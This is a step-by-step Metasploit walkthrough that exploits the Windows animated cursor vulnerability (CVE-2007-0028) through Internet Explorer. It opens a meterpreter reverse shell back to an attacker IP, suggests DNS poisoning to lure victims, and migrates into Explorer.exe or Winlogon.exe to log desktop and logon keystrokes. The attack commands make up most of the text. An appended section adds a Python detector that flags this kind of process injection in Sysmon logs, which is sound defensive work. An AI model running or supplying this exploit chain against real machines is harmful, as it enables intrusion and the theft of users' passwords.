Yours: 131.107.1.252 (BackTrack 3 with Metasploit 3.x)
Step 1: Exploit with Windows Animated Cursor Vulnerability (CVE-2007-0028)
cd /pentest/exploits/msf3
./msfconsole
msf > use windows/browser/ani_loadimage_chunksize
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set SRVHOST 131.107.1.252
msf > set LHOST 131.107.1.252
msf > set SRVPORT 80
msf > set LPORT 443
msf > set URIPATH /you_win.html
msf > exploit
Step 2: Connect to the attacker's machine via IE 6
http://131.107.1.252/you_win.html
Note:
Use DNS poisoning or cache poisoning to map a domain name to the IP address.
Example:
www.abc.com 131.107.1.252
http://www.abc.com/you_win.html
Once you've got the connection, type:
msf > sessions -l
msf > sessions -i 1
Step 3: Migrate into a process (Explorer.exe or Winlogon.exe)
Note:
- Migrate into Explorer.exe if you want to capture Desktop keystrokes.
- Migrate into Winlogon.exe if you want to capture Windows Logon keystrokes.
List all processes...
meterpreter > ps
Migrate into Explorer.exe or Winlogon.exe (replace <PID> with the process ID shown by ps)
meterpreter > migrate <PID>
Start the Keystroke Logger...
meterpreter > keyscan_start
Display the captured keystrokes...
meterpreter > keyscan_dump
Stop the Keystroke Logger...
meterpreter > keyscan_stop
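Defensive counterpart to the migrate step above, added here as an example and not part of the original post: a small Python checker that reads Sysmon-style CreateRemoteThread records and flags a non-system process starting a thread inside Explorer.exe or Winlogon.exe. It assumes the Sysmon Event ID 8 field names (SourceImage, TargetImage, SourceProcessId, TargetProcessId); the log lines are constructed, not captured from a real host.

```python
# Added example (not from the original post): flag a remote thread created
# in a keystroke-bearing process by something other than a Windows system
# binary. Assumes Sysmon Event ID 8 (CreateRemoteThread) field names; the
# log lines are constructed, not captured from a real host.
import re

# Processes an operator migrates into for keystroke capture (from the post).
KEYSTROKE_TARGETS = {"explorer.exe", "winlogon.exe"}
# Constructed Sysmon-style Event ID 8 records as key="value" pairs.
SAMPLE_LOG = [
    'EventID=8 SourceImage="C:\\Windows\\System32\\csrss.exe" SourceProcessId=512 '
    'TargetImage="C:\\Windows\\explorer.exe" TargetProcessId=1488',
    'EventID=8 SourceImage="C:\\Program Files\\Internet Explorer\\iexplore.exe" '
    'SourceProcessId=2204 TargetImage="C:\\Windows\\explorer.exe" TargetProcessId=1488',
    'EventID=8 SourceImage="C:\\Program Files\\Internet Explorer\\iexplore.exe" '
    'SourceProcessId=2204 TargetImage="C:\\Windows\\System32\\winlogon.exe" TargetProcessId=668',
    'EventID=3 Image="C:\\Program Files\\Internet Explorer\\iexplore.exe" DestinationPort=443',
]

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

def parse_event(line):
    """Split one log line into a dict of field -> value (quotes removed)."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in FIELD_RE.finditer(line)}

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def is_suspicious(ev):
    """CreateRemoteThread into explorer/winlogon from a non-system source."""
    if ev.get("EventID") != "8":
        return False
    if basename(ev.get("TargetImage", "")) not in KEYSTROKE_TARGETS:
        return False
    # Threads started by binaries under System32 (csrss, lsass, ...) are routine;
    # a browser process doing it matches the migration described above.
    return not ev.get("SourceImage", "").lower().startswith("c:\\windows\\system32\\")

def find_injections(lines):
    """Return (source PID, source image, target image) per suspicious record."""
    hits = []
    for ev in map(parse_event, lines):
        if is_suspicious(ev):
            hits.append((int(ev["SourceProcessId"]),
                         basename(ev["SourceImage"]), basename(ev["TargetImage"])))
    return hits
```

Calling find_injections(SAMPLE_LOG) returns the two iexplore.exe records and ignores the csrss.exe thread and the network event; in production the System32 whitelist should be replaced by a baseline of the host's normal cross-process thread sources.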